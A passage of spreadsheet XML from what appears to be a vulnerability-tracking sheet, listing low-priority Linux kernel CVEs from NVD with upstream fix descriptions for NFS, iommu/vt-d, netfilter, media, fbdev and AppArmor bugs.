the out_disable label and nvme_pci_free_ctrl(), neither of which releases
the pools, leaking the dma_pool objects.
Release the descriptor pools in the out_disable error path. It must not
be added to nvme_pci_free_ctrl(), as that would double-free against
nvme_remove() on the normal teardown path.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90233</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90234</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="inlineStr"/>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFS: Return a delegation the client fails to record
When an NFS server grants a delegation in an OPEN reply,
nfs_inode_set_delegation() records it on the client. However, three
of its error flows return without sending DELEGRETURN.
A delegation can be relinquished only by DELEGRETURN (RFC 8881
Section 20.2.4), so dropping one silently leaves the server believing
the client still holds it. If the server happens to recall that
delegation, the client answers CB_RECALL with NFS4ERR_BADHANDLE
because it has no record of the stateid. The server revokes the
delegation and moves it onto its cl_revoked list, because the client
never sends the FREE_STATEID that would drain it. Every subsequent
SEQUENCE reply then carries SEQ4_STATUS_RECALLABLE_STATE_REVOKED,
and the client's state manager loops issuing TEST_STATEID across its
delegations without ever clearing the condition.
The window is easy to reach now that a server offers a write
delegation on any write OPEN: a delegation recalled for one opener
races a re-open that the server answers with a fresh write
delegation.
Instead of dropping it, hand the delegation back during these error
flows.</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90234</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90235</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="inlineStr"/>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: xprtsock: annotate shared socket callbacks with READ_ONCE/WRITE_ONCE
xprtsock replaces and restores sk-&gt;sk_data_ready and
sk-&gt;sk_write_space on live sockets with plain stores, and
xs_udp_do_set_buffer_size() invokes sk-&gt;sk_write_space via a plain
load. These callback pointers are shared with generic socket and
protocol paths that may read or invoke them concurrently, so xprtsock
needs the same READ_ONCE()/WRITE_ONCE() callback visibility contract
that the validated 4022 family applied elsewhere.
When SUNRPC takes over an AF_LOCAL, UDP, or TCP socket and later
restores the lower-socket callbacks during teardown, another CPU may
still hold an earlier callback snapshot. The plain replace/restore
pattern leaves the same visibility hole as the validated 4022 family,
so a stale snapshot can still invoke xs_data_ready() or
xs_udp_write_space() after the live callback fields have already been
restored to the lower-socket handlers.
Use WRITE_ONCE() for the shared sk_data_ready and sk_write_space
stores in xs_local_finish_connecting(), xs_udp_finish_connecting(),
xs_tcp_finish_connecting(), and xs_restore_old_callbacks(). Use
READ_ONCE() for the direct sk_write_space invocation in
xs_udp_do_set_buffer_size(). This matches the required callback
visibility contract while leaving adjacent sk_state_change and
sk_error_report handling unchanged.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90235</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90236</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="inlineStr"/>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
      <c r="S604" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Release the export reference when reaping open stateids
nfs4_put_stid() releases the svc_export tracked in
nfs4_stid.sc_export, but free_ol_stateid_reaplist() frees open and
lock stateids by calling -&gt;sc_free() directly, bypassing that path.
An open stateid takes an sc_export reference in nfs4_open() and a
lock stateid takes its own in init_lock_stateid(); both reach
free_ol_stateid_reaplist() through their normal teardown, the open
stateid via release_open_stateid() and the lock stateid via
nfsd4_release_lockowner(), each through put_ol_stateid_locked().
The reference is therefore never dropped, pinning the export and
blocking unmount for the lifetime of the stateid.
Release sc_export in free_ol_stateid_reaplist() the way
nfs4_put_stid() does. -&gt;sc_free() runs once per stateid, and a
stateid reaches free_ol_stateid_reaplist() or nfs4_put_stid() but
never both, so the reference is dropped exactly once. Revoked
stateids reach this path with sc_export already cleared by
drop_stid_export(), so they are skipped rather than double-freed.
nfs4_put_stid() itself read sc_export before acquiring cl_lock.
drop_stid_export() clears that field and releases the reference
under cl_lock, so a concurrent revocation could drop the export in
the window between the read and the final put, releasing the same
reference twice. Read sc_export while cl_lock is held so the two
paths serialize and the reference is released exactly once.</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90236</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90237</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="inlineStr"/>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_ct: move custom expectation support to helper
Originally, the ct expectation support called nf_ct_helper_ext_add() for
confirmed conntracks, which is invalid, triggering a splat. This was
fixed by commit 1710eb913bdc ("netfilter: nft_ct: skip expectations for
confirmed conntrack") which restricted it to unconfirmed conntracks.
However, early insertion of expectations into the expectations list when
the conntrack is unconfirmed leads to stale entries pointing to the
wrong hlist_head through .pprev due to ct extension reallocation.
Commit 7c9664351980 ("netfilter: move nat hlist_head to nf_conn") moved
the nat hlist_head to nf_conn for this reason:
     1. ...
     2. When reallocation of extension area occurs we need to fixup the
        bysource hash head via hlist_replace_rcu.
I'd rather not increase the size of the struct nf_conn for this feature
has very limited scope: only one expectation can be created at a time
given expect_clash() will make nf_ct_expect_related() reports EBUSY.
For this reason, relax nf_ct_expect_related() not to drop packets in
case expectation creation fails, therefore, expectation creation becomes
best effort.
To address this issue, add an internal ct helper and attach it to the
conntrack entry to streamline the custom ct expectation support with
existing ct helpers.
Expose a new nf_conntrack_helper_release() function to release the
internal helper that is allocated and attached to the conntrack entry to
create the custom expectations. The nft_ct module removal always waits
for rcu grace period, then the NULL helper callback is observed after
this.
This patch also restricts the creation of expectations to different
helpers other than this custom helper that is created for this type of
expectations.</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90237</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90238</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="inlineStr"/>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: amd: isp4: fix self-deadlock in isp4sd_pwron_and_init() error path
isp4sd_pwron_and_init() holds ops_mutex via guard(mutex) and, on any
init failure, jumps to err_deinit and calls isp4sd_pwroff_and_deinit().
That helper takes the same ops_mutex, re-acquiring a non-recursive mutex
already held by the current thread, so any init failure deadlocks.
Unwind the error path in stages instead, releasing only what each
failure point acquired. This also avoids the issues that an
unconditional teardown would hit at the earlier failures, such as a
runtime-PM underflow from pm_runtime_resume_and_get() and MMIO access
while the device is unpowered.</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90238</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90239</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="inlineStr"/>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr"/>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: amd: isp4: release partial allocations in isp4if_alloc_fw_gpumem()
isp4if_alloc_fw_gpumem() allocates several GPU memory pools in sequence.
If one of them fails, it jumps to error_no_memory and returns -ENOMEM
without releasing the pools that were already allocated, leaking them.
Release the already-allocated pools before returning. isp4if_gpu_mem_free()
is a no-op on pools that were not allocated, so calling
isp4if_dealloc_fw_gpumem() here safely frees exactly the pools that
succeeded.
isp4if_gpu_mem_free() previously logged an error for a NULL entry, which
is a normal case during partial-allocation cleanup, so make it silent.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90239</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90240</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="inlineStr"/>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Flush context cache with correct SID when tearing down aliases
domain_context_clear_one() and device_pasid_table_teardown() are both
invoked once per DMA alias of a device. Each function locates the context
entry using the bus/devfn pair provided by the pci_for_each_dma_alias()
callback, then calls intel_context_flush_no_pasid(), which constructs a
device-selective context-cache invalidation from info-&gt;bus and
info-&gt;devfn (that is, always the requester ID of the device itself).
As a result, for every alias other than the device’s own RID, the context
entry that was just cleared in memory is never invalidated in the context
cache. Hardware may continue using that stale cached entry. In the
scalable-mode teardown path, intel_pasid_free_table() can then free the
PASID directory still referenced by that stale entry, allowing the IOMMU
to walk freed memory.
Fix this by passing the source ID of the entry being torn down to
intel_context_flush_no_pasid(), instead of deriving it from @info.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90240</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90241</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="inlineStr"/>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr"/>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Tear down scalable-mode context on probe failure
intel_pasid_setup_sm_context() walks a PCI device’s DMA aliases via
pci_for_each_dma_alias() and programs a scalable-mode context entry for
each RID. For a device with a dma_alias_mask, the callback is invoked
once for the device’s own RID and once for each alias bit, all with the
same pci_dev, so device_pasid_table_setup() runs for multiple RIDs.
pci_for_each_dma_alias() stops at the first callback error. Therefore, a
failure partway through the walk can leave context entries for already
processed RIDs present and still pointing to the device’s PASID table.
On this error path, intel_iommu_probe_device() currently jumps directly
to intel_pasid_free_table(), which frees the PASID table without
first tearing down those context entries. The IOMMU may then walk a
present context entry whose PASID table pointer references freed
memory.
intel_iommu_release_device() already performs teardown before freeing the
table. Apply the same ordering on the probe failure path.
device_pasid_table_teardown() safely handles RIDs that were never
programmed: iommu_context_addr() returns NULL when no context table has
been allocated, and clearing the Present bit of an already non-present
entry is a no-op. So unwind is safe for both the alias that failed and
any aliases not yet reached.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90241</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90242</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="inlineStr"/>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Fix iopf_refcount leak on RID domain replacement
intel_iommu_attach_device() enables IOPF for the new domain but never
disables it for the old one.  device_block_translation(), called at the
start of the function, tears down translation but does not touch any IOPF
state; blocking_domain_attach_dev() has to call iopf_for_domain_remove()
explicitly before invoking it for exactly this reason.
identity_domain_attach_dev() has the same problem.  Its comment claims
that no PRI handling is needed because the device has been put in the
blocking state, but the blocking state and the IOPF reference count are
independent of each other.
As a result, replacing a domain that has an iopf_handler with another
domain at RID level leaks a reference in info-&gt;iopf_refcount.  The count
never drops back to zero, so iopf_queue_remove_device() is never called
and iommu_disable_pci_pri() triggers its WARN_ON(info-&gt;iopf_refcount)
when the device is released.
The PASID paths already handle this correctly by way of
iopf_for_domain_replace(); convert the two RID paths to do the same.
Using the replace helper rather than a bare remove keeps the enable
before the disable, so the reference count does not transiently reach
zero and evict the device from the IOPF queue.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90242</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90243</t>
        </is>
      </c>
      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Clear Present bit before tearing down copied context entry
copied_context_tear_down() zeroes the 128-bit context entry with
context_clear_entry() while the Present bit is still set, and only then
issues the context-cache and IOTLB invalidations.  This leaves a window
in which hardware can fetch a torn entry, with some fields already zeroed
while Present is still set, leading to unpredictable behaviour or
spurious faults.  While x86 provides strong write ordering, the compiler
may reorder the writes to the two 64-bit halves of the entry, and the
hardware fetch is not guaranteed to be atomic with respect to multiple
CPU writes.
There is no cacheline flush before the invalidation either, so on an
IOMMU without coherent access to the context table the zeroed entry may
not be visible to hardware at the point the invalidation is submitted.
Apply the same ownership handshake described in the VT-d spec, Section
6.5.3.3 ("Guidance to Software for Invalidations"): clear only the Present
bit, flush it out to the IOMMU, perform the invalidations, and only then
zero the remainder of the entry.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90243</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90244</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/dma: Restore locking around msi_page_list
Unlike a group's default domain, which is always freshly allocated
and privately owned (iommu_group_alloc_default_domain()), VFIO type1's
legacy container merges any newly attached group into an existing
domain whenever their iommu_ops and cache-coherency enforcement match.
iommu_dma_get_msi_page() only asserts the caller's own group mutex is
held (iommu_group_mutex_assert()). On an IOMMU that publishes
IOMMU_RESV_SW_MSI, e.g. ARM SMMU, a VM with two such devices assigned
through the legacy container can have their guest drivers probe and
allocate MSIs in parallel; each host-side VFIO_DEVICE_SET_IRQS lands
on a different device fd and group mutex, but both devices' domains
are the same merged domain, so both can enter
iommu_dma_get_msi_page() concurrently and corrupt msi_page_list.
commit 288683c92b1a ("iommu: Make iommu_dma_prepare_msi() into a
generic operation") dropped the prior msi_prepare_lock on the
reasoning that "each iommu_domain is unique to a group," which holds
for default domains but not this VFIO type1 case. Restore the static
lock, since it's only guarding a corner case and will likely never
be contended.
iommufd avoids the equivalent problem by having its own callers
(iommufd_sw_map_msi()) take a ctx-wide sw_msi_lock before ever
reaching the shared list. VFIO type1 can't mirror that since it
dispatches to iommu_dma_sw_msi() which is outside VFIO's jurisdiction.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90244</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90245</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: kyro: Validate overlay viewport coordinates
The overlay viewport end coordinates are computed from the viewport
origin and dimensions using 32-bit unsigned arithmetic. Large input
values can cause these calculations to wrap around before the resulting
coordinates are passed to SetOverlayViewPort().
SetOverlayViewPort() packs the viewport coordinates into 16-bit
register fields. The X coordinates are additionally adjusted by +2
and +1 before being written. Validate the coordinate calculations
for 32-bit wraparound and ensure that the adjusted coordinates fit
within their 16-bit register fields before calling
SetOverlayViewPort().
Found by Linux Verification Center (linuxtesting.org) with SVACE.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90245</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90246</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix integer overflow in verify_tags() bounds check
verify_tags() validates the tagset table unpacked from a policy blob.
For each set it reads a count and checks that advancing the index by
that count stays inside sets.table[]:
	u32 cnt = tags-&gt;sets.table[i];
	if (i+cnt &gt;= tags-&gt;sets.size) {
i, cnt and sets.size are all u32, so i+cnt is evaluated modulo 2^32.
sets.table[] is filled by unpack_tagsets() with aa_unpack_u32(), so
every entry is a raw unbounded 32-bit word taken from the policy blob,
and verify_tags() is the function that is supposed to validate it.  A
